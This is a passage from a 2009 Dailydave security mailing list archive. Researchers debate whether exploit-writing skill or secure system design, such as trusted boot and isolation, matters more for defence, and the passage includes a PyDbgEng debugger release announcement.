exploitable"[1] or not is a really hard problem - far beyond > what !exploitable is useful for. (It claims to do data tainting, but this is > clearly a misnomer?). Basically it divides things into "Definitely likely to > be exploitable because EIP is 41414141", "Pretty much likely to be > exploitable cause we're writing to bad memory" and "Everything else". > > So here's my little idea (which I'm sure everyone else has had at least > twice cause I'm not a special snowflake): Take each basic block and number > it. Execute the program twice, once with your crashing file, and once with > your template. This generates two signals, which have a stream of numbers in > them (from the execution trace). Then you can do interesting things by > converting to frequency domain (I.E. FFT?) and doing filtering and > visualization. Ben thinks you want to attach state to your numbers too (i.e. > memory and register info?). I'm not so keen on that because I think too much > data can be as bad as too little, but whatever. Each to their own. > > I'm not sure what the interesting thing here is that magically tells you > something is worth really digging into? Maybe you take your two signals, and > subtract their frequencies and visualize how different they are? Throw that > at a HMM/NN and make it tell you something? > > -dave > > [1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just > returns true. :> > [2] Literally. > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From dave at immunityinc.com Tue Jul 14 09:32:20 2009 From: dave at immunityinc.com (dave) Date: Tue, 14 Jul 2009 09:32:20 -0400 Subject: [Dailydave] Staying on the treadmill. Message-ID: <4A5C88E4.90502@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 People (this means you) like to think hard about game changing events in the world of hacking. But just staying on the treadmill of exploit after exploit can be a game changing event. For example, today you may have noticed that Intevydis (http://www.intevydis.com/vulndisco.shtml) released as part of their latest exploit pack, some exploits for all the major access point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I mean "Here's a shell, now you get to install new programs and muck with the router's configuration" exploits. For a lot of people (not you) it's hard to care about such things. The inevitable ennui sets in: "oh, not another one", "that one is similar to one I found in 1992AD", "well, if you had good patch management that's the best you can do!", etc. etc. The magic is in finding each one of these things unique and special and worth of attention. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkpciOMACgkQtehAhL0ghep7CgCeNNMGxZE9CxYf+lDUWjZ+jjDu 4QMAnjZ8ImzghK99LwUv0jnaETv5SgnD =nKye -----END PGP SIGNATURE----- From joanna at invisiblethingslab.com Tue Jul 14 10:07:21 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 16:07:21 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5C88E4.90502@immunityinc.com> References: <4A5C88E4.90502@immunityinc.com> Message-ID: <4A5C9119.50902@invisiblethingslab.com> dave wrote: > People (this means you) like to think hard about game changing events in > the world of hacking. But just staying on the treadmill of exploit after > exploit can be a game changing event. > > For example, today you may have noticed that Intevydis > (http://www.intevydis.com/vulndisco.shtml) released as part of their > latest exploit pack, some exploits for all the major access > point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I > mean "Here's a shell, now you get to install new programs and muck with > the router's configuration" exploits. > > For a lot of people (not you) it's hard to care about such things. The > inevitable ennui sets in: "oh, not another one", "that one is similar to > one I found in 1992AD", "well, if you had good patch management that's > the best you can do!", etc. etc. > > The magic is in finding each one of these things unique and special and > worth of attention. > ... or, instead of being an exploit fetishist, one might try to design their network in such a way that a compromise of your network devices is not fatal. Same for PDF viewers, browsers, etc. and how you design your computer system. Sure, it's cool to write exploits -- that always impresses people. We also do that at ITL. E.g. we will be showing a couple of VM escape exploits during our upcoming virtualization training (and we really are excited about those exploits!), but the whole point is to illustrate how a good design (in that particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can mitigate a problem of exploits, even if we cannot find and patch them all. I think one should not forget that an exploit, no matter how cool, is only an illustration of a problem. The actual solutions often have nothing to do with how exploits are written. Do you really think VT-d designers were heap-overflow ninjas? I doubt. joanna. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/43b9c78b/attachment-0001.pgp From version5 at gmail.com Tue Jul 14 10:44:08 2009 From: version5 at gmail.com (nnp) Date: Tue, 14 Jul 2009 15:44:08 +0100 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5C9119.50902@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> Message-ID: <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> Protection mechanisms being written by people who don't understand exploits is surely the reason many are broken within about 43 seconds of being released. On Tue, Jul 14, 2009 at 3:07 PM, Joanna Rutkowska wrote: > dave wrote: >> People (this means you) like to think hard about game changing events in >> the world of hacking. But just staying on the treadmill of exploit after >> exploit can be a game changing event. >> >> For example, today you may have noticed that Intevydis >> (http://www.intevydis.com/vulndisco.shtml) released as part of their >> latest exploit pack, some exploits for all the major access >> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I >> mean "Here's a shell, now you get to install new programs and muck with >> the router's configuration" exploits. >> >> For a lot of people (not you) it's hard to care about such things. The >> inevitable ennui sets in: "oh, not another one", "that one is similar to >> one I found in 1992AD", "well, if you had good patch management that's >> the best you can do!", etc. etc. >> >> The magic is in finding each one of these things unique and special and >> worth of attention. >> > > ... or, instead of being an exploit fetishist, one might try to design their > network in such a way that a compromise of your network devices is not fatal. > Same for PDF viewers, browsers, etc. and how you design your computer system. > > Sure, it's cool to write exploits -- that always impresses people. We also do > that at ITL. E.g. we will be showing a couple of VM escape exploits during our > upcoming virtualization training (and we really are excited about those > exploits!), but the whole point is to illustrate how a good design (in that > particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can > mitigate a problem of exploits, even if we cannot find and patch them all. > > I think one should not forget that an exploit, no matter how cool, is only an > illustration of a problem. The actual solutions often have nothing to do with > how exploits are written. Do you really think VT-d designers were heap-overflow > ninjas? I doubt. > > joanna. > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From joanna at invisiblethingslab.com Tue Jul 14 11:29:57 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 17:29:57 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> Message-ID: <4A5CA475.8030107@invisiblethingslab.com> nnp wrote: > Protection mechanisms being written by people who don't understand > exploits is surely the reason many are broken within about 43 seconds > of being released. > Sure, but there is a difference between "understanding exploits" and being an exploit fetishist. Some time ago I attended a security conference well known for having very technical audience. I was told the majority of those people are up to date with all the recent advances in exploitation techniques -- heap overflows, getting around ASRL/NX, etc. But when I started my lecture, which was about Trusted Computing, it turned the number of people who knew how TPM works was... close to zero! And we're talking about some real basic stuff here, nothing fancy like TXT. Just what a PCR register is, and what are the advantages of trusted boot. I actually read recently an interview with a well know researcher, who I actually respect myself, who happily announced that he's protecting his laptop using an FDE software, and, to make it more secure, he's powering it down as often as possible (in order to mitigate possibility of cold-boot attacks). Interestingly, he didn't realize he actually makes it much easier for even a hotel maid to get his encryption key... This is so basic and yet have nothing to do with advanced exploit understanding. Now, who do you think can provide more security into an organization, like e.g. a bank -- a heap-overflow ninja that can bypass ASLR on the most recent Vista, or a person who would realize that maybe it is worth buying a trusted-boot-supported full disk encryption (FDE) software, as otherwise it would be trivial for the *real* adversary to get around it? Or a person that can tell you that your employees should use 2 different desktop computers and would be able to decide how to split tasks and activities between the two? Sure, experience in exploit writing is sometimes crucial. Probably it is of the utmost important to e.g. OS kernel architects, who might attempt to build in all the anti-exploitation technologies into the OS (which is what they do in fact). Or to processor and chipset vendors. This requires great understanding of possible workarounds. It is also important for governments for obvious reasons. But very few people are OS kernel architects and governments offensive teams. And the further you go, the less you need those extreme skills, which is exploit writing as it is today. If you are only a *consumer* of computer products (e.g. a bank, or an airport), then I really see no reason why you should even be able to understand the difference between a heap overflow vs. stack overflow. You just need to understand what a shellcode is and what it can potentially do (i.e. everything). You should understand that SELinux will not provide you all the promised features, because it has big monolithic TCB (the Linux kernel) that represents a huge attack vector. But you don't need to know how to write an exploit for SELinux. etc. joanna. > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > Rutkowska wrote: >> dave wrote: >>> People (this means you) like to think hard about game changing events in >>> the world of hacking. But just staying on the treadmill of exploit after >>> exploit can be a game changing event. >>> >>> For example, today you may have noticed that Intevydis >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their >>> latest exploit pack, some exploits for all the major access >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I >>> mean "Here's a shell, now you get to install new programs and muck with >>> the router's configuration" exploits. >>> >>> For a lot of people (not you) it's hard to care about such things. The >>> inevitable ennui sets in: "oh, not another one", "that one is similar to >>> one I found in 1992AD", "well, if you had good patch management that's >>> the best you can do!", etc. etc. >>> >>> The magic is in finding each one of these things unique and special and >>> worth of attention. >>> >> ... or, instead of being an exploit fetishist, one might try to design their >> network in such a way that a compromise of your network devices is not fatal. >> Same for PDF viewers, browsers, etc. and how you design your computer system. >> >> Sure, it's cool to write exploits -- that always impresses people. We also do >> that at ITL. E.g. we will be showing a couple of VM escape exploits during our >> upcoming virtualization training (and we really are excited about those >> exploits!), but the whole point is to illustrate how a good design (in that >> particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can >> mitigate a problem of exploits, even if we cannot find and patch them all. >> >> I think one should not forget that an exploit, no matter how cool, is only an >> illustration of a problem. The actual solutions often have nothing to do with >> how exploits are written. Do you really think VT-d designers were heap-overflow >> ninjas? I doubt. >> >> joanna. >> >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> >> -- Joanna Rutkowska Founder/CEO Invisible Things Lab http://invisiblethingslab.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/ea9b255b/attachment.pgp From halvar at gmx.de Tue Jul 14 12:22:13 2009 From: halvar at gmx.de (Halvar Flake) Date: 14 Jul 2009 18:22:13 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5C9119.50902@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> Message-ID: <4A5CB0B5.7090003@gmx.de> Joanna wrote: >... or, instead of being an exploit fetishist, one might try to design their >network in such a way that a compromise of your network devices is not fatal. >Same for PDF viewers, browsers, etc. and how you design your computer system. Where would be the fun in that ? >I think one should not forget that an exploit, no matter how cool, is only an >illustration of a problem Strangely enough, we live in a world where the problems have a tendency to be much more interesting than the solutions. But it's difficult to argue about personal preferences. Cheers, Halvar From joanna at invisiblethingslab.com Tue Jul 14 12:25:22 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 18:25:22 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CB0B5.7090003@gmx.de> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <4A5CB0B5.7090003@gmx.de> Message-ID: <4A5CB172.9050706@invisiblethingslab.com> Halvar Flake wrote: > Joanna wrote: > >> ... or, instead of being an exploit fetishist, one might try to design their >> network in such a way that a compromise of your network devices is not fatal. >> Same for PDF viewers, browsers, etc. and how you design your computer system. > > Where would be the fun in that ? Excuse me, I'm confused, are we talking here about computer security or about sex? joanna. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/98d031c0/attachment.pgp From halvar at gmx.de Tue Jul 14 12:50:01 2009 From: halvar at gmx.de (Halvar Flake) Date: 14 Jul 2009 18:50:01 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CB172.9050706@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <4A5CB0B5.7090003@gmx.de> <4A5CB172.9050706@invisiblethingslab.com> Message-ID: <4A5CB739.5070208@gmx.de> >>> ... or, instead of being an exploit fetishist, one might try to design their >>> network in such a way that a compromise of your network devices is not fatal. >>> Same for PDF viewers, browsers, etc. and how you design your computer system. >>> >> Where would be the fun in that ? >> > > Excuse me, I'm confused, are we talking here about computer security or about sex? > > joanna. > As I am world-famous for my monk-like lifestyle, computer security. I wouldn't dare to comment on things that I have no clue about. From don.bailey at gmail.com Tue Jul 14 14:53:53 2009 From: don.bailey at gmail.com (Don Bailey) Date: Tue, 14 Jul 2009 11:53:53 -0700 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CA475.8030107@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> Message-ID: <68eb39920907141153r40494717pb57828268cdc3336@mail.gmail.com> I agree with Johanna here. Everyone that knows me would expect me to bang on the importance of exploits over and over. However, in the past year, I've come to realize that it's really about the threat model around the vulnerability you're exploiting. We can get as granular as we want into how to bypass X, Y, and Z, mitigation technology. At the end of the day it really comes down to securing the design, not the vulnerability. The fact that I can write a NULL kernel dereference exploit in (literally) 15 minutes has nothing to do with how cool NULL pointer exploits are or how insecure the operating system is. Rather, what it has to do with is the fact that I'm attacking a design flaw. Banging on the importance of protecting from NULL/Userland/Whatever-you-want-to-call-it-today dereference attacks isn't the point. The point is addressing it with defense in depth by integrating protection into the product design. Although, I do agree that understanding exploit strategy is an imperative when designing a secure system. If you don't know that X strategy exists, how do you protect it? While I do agree that generally you can build a threat model around unknowns and apply mitigation techniques that can compartmentalize potential threat sources that have exploited a given risk, I think that it may be easier to do this if the developer team knows about as many strategies as possible. So, I think there must be a balance. Your favorite kernel developer may not know understand heap feng shui, but I bet they understand heap overflow basics and know more about designing a proper heap abstraction than most exploit developers. D On Tue, Jul 14, 2009 at 8:29 AM, Joanna Rutkowska < joanna at invisiblethingslab.com> wrote: > nnp wrote: > > Protection mechanisms being written by people who don't understand > > exploits is surely the reason many are broken within about 43 seconds > > of being released. > > > > Sure, but there is a difference between "understanding exploits" and being > an > exploit fetishist. > > Some time ago I attended a security conference well known for having very > technical audience. I was told the majority of those people are up to date > with > all the recent advances in exploitation techniques -- heap overflows, > getting > around ASRL/NX, etc. But when I started my lecture, which was about Trusted > Computing, it turned the number of people who knew how TPM works was... > close to > zero! And we're talking about some real basic stuff here, nothing fancy > like > TXT. Just what a PCR register is, and what are the advantages of trusted > boot. > > I actually read recently an interview with a well know researcher, who I > actually respect myself, who happily announced that he's protecting his > laptop > using an FDE software, and, to make it more secure, he's powering it down > as > often as possible (in order to mitigate possibility of cold-boot attacks). > Interestingly, he didn't realize he actually makes it much easier for even > a > hotel maid to get his encryption key... This is so basic and yet have > nothing to > do with advanced exploit understanding. > > Now, who do you think can provide more security into an organization, like > e.g. > a bank -- a heap-overflow ninja that can bypass ASLR on the most recent > Vista, > or a person who would realize that maybe it is worth buying a > trusted-boot-supported full disk encryption (FDE) software, as otherwise it > would be trivial for the *real* adversary to get around it? Or a person > that can > tell you that your employees should use 2 different desktop computers and > would > be able to decide how to split tasks and activities between the two? > > Sure, experience in exploit writing is sometimes crucial. Probably it is of > the > utmost important to e.g. OS kernel architects, who might attempt to build > in all > the anti-exploitation technologies into the OS (which is what they do in > fact). > Or to processor and chipset vendors. This requires great understanding of > possible workarounds. > > It is also important for governments for obvious reasons. > > But very few people are OS kernel architects and governments offensive > teams. > And the further you go, the less you need those extreme skills, which is > exploit > writing as it is today. If you are only a *consumer* of computer products > (e.g. > a bank, or an airport), then I really see no reason why you should even be > able > to understand the difference between a heap overflow vs. stack overflow. > You > just need to understand what a shellcode is and what it can potentially do > (i.e. > everything). You should understand that SELinux will not provide you all > the > promised features, because it has big monolithic TCB (the Linux kernel) > that > represents a huge attack vector. But you don't need to know how to write an > exploit for SELinux. etc. > > joanna. > > > > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > > Rutkowska wrote: > >> dave wrote: > >>> People (this means you) like to think hard about game changing events > in > >>> the world of hacking. But just staying on the treadmill of exploit > after > >>> exploit can be a game changing event. > >>> > >>> For example, today you may have noticed that Intevydis > >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their > >>> latest exploit pack, some exploits for all the major access > >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I > >>> mean "Here's a shell, now you get to install new programs and muck with > >>> the router's configuration" exploits. > >>> > >>> For a lot of people (not you) it's hard to care about such things. The > >>> inevitable ennui sets in: "oh, not another one", "that one is similar > to > >>> one I found in 1992AD", "well, if you had good patch management that's > >>> the best you can do!", etc. etc. > >>> > >>> The magic is in finding each one of these things unique and special and > >>> worth of attention. > >>> > >> ... or, instead of being an exploit fetishist, one might try to design > their > >> network in such a way that a compromise of your network devices is not > fatal. > >> Same for PDF viewers, browsers, etc. and how you design your computer > system. > >> > >> Sure, it's cool to write exploits -- that always impresses people. We > also do > >> that at ITL. E.g. we will be showing a couple of VM escape exploits > during our > >> upcoming virtualization training (and we really are excited about those > >> exploits!), but the whole point is to illustrate how a good design (in > that > >> particular case of your hypervisor) and new technologies (e.g. VT-d or > TXT) can > >> mitigate a problem of exploits, even if we cannot find and patch them > all. > >> > >> I think one should not forget that an exploit, no matter how cool, is > only an > >> illustration of a problem. The actual solutions often have nothing to do > with > >> how exploits are written. Do you really think VT-d designers were > heap-overflow > >> ninjas? I doubt. > >> > >> joanna. > >> > >> > >> _______________________________________________ > >> Dailydave mailing list > >> Dailydave at lists.immunitysec.com > >> http://lists.immunitysec.com/mailman/listinfo/dailydave > >> > >> > > > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/413d0b6c/attachment-0001.htm From meddington at gmail.com Wed Jul 15 02:22:13 2009 From: meddington at gmail.com (Michael Eddington) Date: Tue, 14 Jul 2009 23:22:13 -0700 Subject: [Dailydave] Announce: PyDbgEng v0.10 Message-ID: <2db0cefa0907142322l2c643040m10cef57c25ac7439@mail.gmail.com> Seems I'm the new maintainer for PyDbgEng, the first (that I'm aware of) Python wrapper for the WinDbg COM object DbgEng. This new version includes all the changes I have made while using PyDbgEng with Peach. This includes removing the native code requirements (now pure python), adding support for the latest comtypes libraries, and testing with 64bit Python/WinDbg. PyDbgEng now installs as a normal python module (python setup.py install) and will locate WinDbg if installed to any semi-normal place. Should "Just work" for most people. Also included is a py2exe setup script for the advanced user. The module has proven stable under heavy use for the last year or so. Patches and bug fixed always welcome! http://sourceforge.net/projects/pydbgeng/ mike From mjw at cyberwart.com Wed Jul 15 11:16:59 2009 From: mjw at cyberwart.com (Matthew Wollenweber) Date: Wed, 15 Jul 2009 11:16:59 -0400 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CA475.8030107@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> Message-ID: <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com> > > I actually read recently an interview with a well know researcher, who I > actually respect myself, who happily announced that he's protecting his > laptop > using an FDE software, and, to make it more secure, he's powering it down > as > often as possible (in order to mitigate possibility of cold-boot attacks). > Interestingly, he didn't realize he actually makes it much easier for even > a > hotel maid to get his encryption key... This is so basic and yet have > nothing to > do with advanced exploit understanding. > Several years ago I was an intern at nasa. One of the things they like to do to interns is give them senseless tours. During one such tour I learned that they were very excited about updating computers going into space with a 386 processor. It had taken them more than 10 years to evaluate and reduce risk to acceptable levels. Even then, I was told there were 2 backups -- just in case. My point is that you can have a fetish for esoteric attacks where the hotel maid is stealing fde passwords and spend years developing mitigations. You can even go further trying to build 'secure systems' or 'trusted computing', but if you can do it within a time period applicable to people or before the uses cases and attack vectors completely shift, I'd be truly surprised. Building something that will withstand anything that goes wrong is exponentially more complicated and time consuming than refining systems that minimizes evolving known risks. The much more probable attacks are that the researchers laptop is lost, stolen, or that while online it's compromised be a heap-overflow ninja with an IE/Firefox/whatever exploit. So with FDE and understanding heap-overflow ninjitsu he's probably better off than waiting for trusted computing. Then again, I much preferred the portion of the tour with the room size speaker that shook satellites to see what would fall off and break. When it did, they determined the problem and fixed it... much like the exploit writers. When an exploit is part of a process then it's much more than simply demonstrating a problem -- it's iteratively finding and fixing the weak spots. On Tue, Jul 14, 2009 at 11:29 AM, Joanna Rutkowska < joanna at invisiblethingslab.com> wrote: > nnp wrote: > > Protection mechanisms being written by people who don't understand > > exploits is surely the reason many are broken within about 43 seconds > > of being released. > > > > Sure, but there is a difference between "understanding exploits" and being > an > exploit fetishist. > > Some time ago I attended a security conference well known for having very > technical audience. I was told the majority of those people are up to date > with > all the recent advances in exploitation techniques -- heap overflows, > getting > around ASRL/NX, etc. But when I started my lecture, which was about Trusted > Computing, it turned the number of people who knew how TPM works was... > close to > zero! And we're talking about some real basic stuff here, nothing fancy > like > TXT. Just what a PCR register is, and what are the advantages of trusted > boot. > > I actually read recently an interview with a well know researcher, who I > actually respect myself, who happily announced that he's protecting his > laptop > using an FDE software, and, to make it more secure, he's powering it down > as > often as possible (in order to mitigate possibility of cold-boot attacks). > Interestingly, he didn't realize he actually makes it much easier for even > a > hotel maid to get his encryption key... This is so basic and yet have > nothing to > do with advanced exploit understanding. > > Now, who do you think can provide more security into an organization, like > e.g. > a bank -- a heap-overflow ninja that can bypass ASLR on the most recent > Vista, > or a person who would realize that maybe it is worth buying a > trusted-boot-supported full disk encryption (FDE) software, as otherwise it > would be trivial for the *real* adversary to get around it? Or a person > that can > tell you that your employees should use 2 different desktop computers and > would > be able to decide how to split tasks and activities between the two? > > Sure, experience in exploit writing is sometimes crucial. Probably it is of > the > utmost important to e.g. OS kernel architects, who might attempt to build > in all > the anti-exploitation technologies into the OS (which is what they do in > fact). > Or to processor and chipset vendors. This requires great understanding of > possible workarounds. > > It is also important for governments for obvious reasons. > > But very few people are OS kernel architects and governments offensive > teams. > And the further you go, the less you need those extreme skills, which is > exploit > writing as it is today. If you are only a *consumer* of computer products > (e.g. > a bank, or an airport), then I really see no reason why you should even be > able > to understand the difference between a heap overflow vs. stack overflow. > You > just need to understand what a shellcode is and what it can potentially do > (i.e. > everything). You should understand that SELinux will not provide you all > the > promised features, because it has big monolithic TCB (the Linux kernel) > that > represents a huge attack vector. But you don't need to know how to write an > exploit for SELinux. etc. > > joanna. > > > > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > > Rutkowska wrote: > >> dave wrote: > >>> People (this means you) like to think hard about game changing events > in > >>> the world of hacking. But just staying on the treadmill of exploit > after > >>> exploit can be a game changing event. > >>> > >>> For example, today you may have noticed that Intevydis > >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their > >>> latest exploit pack, some exploits for all the major access > >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I > >>> mean "Here's a shell, now you get to install new programs and muck with > >>> the router's configuration" exploits. > >>> > >>> For a lot of people (not you) it's hard to care about such things. The > >>> inevitable ennui sets in: "oh, not another one", "that one is similar > to > >>> one I found in 1992AD", "well, if you had good patch management that's > >>> the best you can do!", etc. etc. > >>> > >>> The magic is in finding each one of these things unique and special and > >>> worth of attention. > >>> > >> ... or, instead of being an exploit fetishist, one might try to design > their > >> network in such a way that a compromise of your network devices is not > fatal. > >> Same for PDF viewers, browsers, etc. and how you design your computer > system. > >> > >> Sure, it's cool to write exploits -- that always impresses people. We > also do > >> that at ITL. E.g. we will be showing a couple of VM escape exploits > during our > >> upcoming virtualization training (and we really are excited about those > >> exploits!), but the whole point is to illustrate how a good design (in > that > >> particular case of your hypervisor) and new technologies (e.g. VT-d or > TXT) can > >> mitigate a problem of exploits, even if we cannot find and patch them > all. > >> > >> I think one should not forget that an exploit, no matter how cool, is > only an > >> illustration of a problem. The actual solutions often have nothing to do > with > >> how exploits are written. Do you really think VT-d designers were > heap-overflow > >> ninjas? I doubt. > >> > >> joanna. > >> > >> > >> _______________________________________________ > >> Dailydave mailing list > >> Dailydave at lists.immunitysec.com > >> http://lists.immunitysec.com/mailman/listinfo/dailydave > >> > >> > > > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -- Matthew Wollenweber mjw at cyberwart.com 703-395-5036 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090715/44a101d3/attachment.htm From joanna at invisiblethingslab.com Wed Jul 15 11:40:05 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Wed, 15 Jul 2009 17:40:05 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com> Message-ID: <4A5DF855.8030305@invisiblethingslab.com> Matthew Wollenweber wrote: > My point is that you can have a fetish for esoteric attacks where the hotel > maid is stealing fde passwords and spend years developing mitigations. You got it backwards! The example of hotel maid stealing your FDE password was a *simple* attack, for which we already have off-the shelve solutions (e.g. Bitlocker). > The much more probable attacks are that the researchers laptop is lost, > stolen, or that while online it's compromised be a heap-overflow ninja with > an IE/Firefox/whatever exploit. But when designing your security, you should assume that this will always happen on your daily-use browser. It is a mistake to think otherwise. > So with FDE and understanding heap-overflow ninjitsu he's probably better off > than waiting for trusted computing. > So, how's the heap-overflow nija can help mitigate those browser attacks? By spending 4543523444234533 days looking at the code of all the applications that your company uses and finding all possible overflows and other bugs there? ;) > Then again, I much preferred the portion of the tour with the room size > speaker that shook satellites to see what would fall off and break. When it > did, they determined the problem and fixed it... much like the exploit > writers. When an exploit is part of a process then it's much more than > simply demonstrating a problem -- it's iteratively finding and fixing the > weak spots. > So, you're saying that fuzzing is the "much preferred" way? Even if we assumed this to be true (which is not, of course), then still, I'm asking you, why do an organization need heap overflow ninja? To operate the shaking speaker, errm, fuzzer? ;) joanna. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090715/d78508ff/attachment.pgp From halvar at gmx.de Wed Jul 15 18:23:33 2009 From: halvar at gmx.de (Halvar Flake) Date: 16 Jul 2009 00:23:33 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5E0ABB.9060606@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com> <4A5DF855.8030305@invisiblethingslab.com> <5fb633320907150931r3ad4c189v59192a31d4b0f400@mail.gmail.com> <4A5E0ABB.9060606@invisiblethingslab.com> Message-ID: <4A5E56E5.6010604@gmx.de> In order to continue my tradition of mostly nonsensical posts: Joanna wrote: > No! I highly respect all the people who demonstrated how different things are > possible. When you show an exploit that attacks things that have never been > attacked before, it is extremely useful. Remember Solar Designer's JPEG Netscape > *first* public heap overflow? Now, that's what matters. > > But coming up with yet-another-one client-side exploit for Browser/PDF > viewer/etc usually is meaningless. We have seen enough such exploits to > understand that currently used mitigations do not work (apps code audit, apps > fuzzing, ASLR, NX), and that we should assume any desktop application that takes > untrusted input can be exploited. And we need to address the problem in a > different way, with the assumption that even some applications on my desktops > gets compromised that others still work. Today's OSes do not provide this feature. > I wholeheartedly agree. It has long been my (and my employers) position that there are way too many presentations of exploitation techniques. I therefore propose that we alter this years' Blackhat schedule as follows: - Remove the John McDonald / Chris Valasek talk - Remove FX's talk - Remove the Dowd/Smith/Dewey talk - Remove Kostya's talk Instead, I think we should substitute at least two of these with fundamental talks about trusted computing, one with a talk about homomorphic encryption, on smartcards and one with a talk about visual spoofing. I would like some songs, too. And *plenty* of architecture diagrams please, perhaps with a security proof thrown in. :-P > It was joked away, because we are not paid for having fun, but for (trying) to > solve the actual problems our customers might have. I'm yet to find a company > that would be advertising their services as "hire us, so *we* could have some > fun". Have you seen one? Halvar's maybe? Or is it rather "hire us, we will help > you *solve* your problems?" > I would prefer to advertise: "You might have some problems that we would have a ton of fun with. If you make sure we don't starve while having fun with these problems, we'll do an excellent job -- we love our work, and take pride in it. Would you prefer to hire someone that likes his work, or someone that gets paid to pretend to like it ?" :-) Holy crap, where has the lightheartedness gone ? Could we *please* all quit taking ourselves quite so seriously ? I am looking forwards to seeing y'all in Vegas in 10 days. Cheers, Halvar From jlloret at dcom.upv.es Thu Jul 16 04:28:51 2009 From: jlloret at 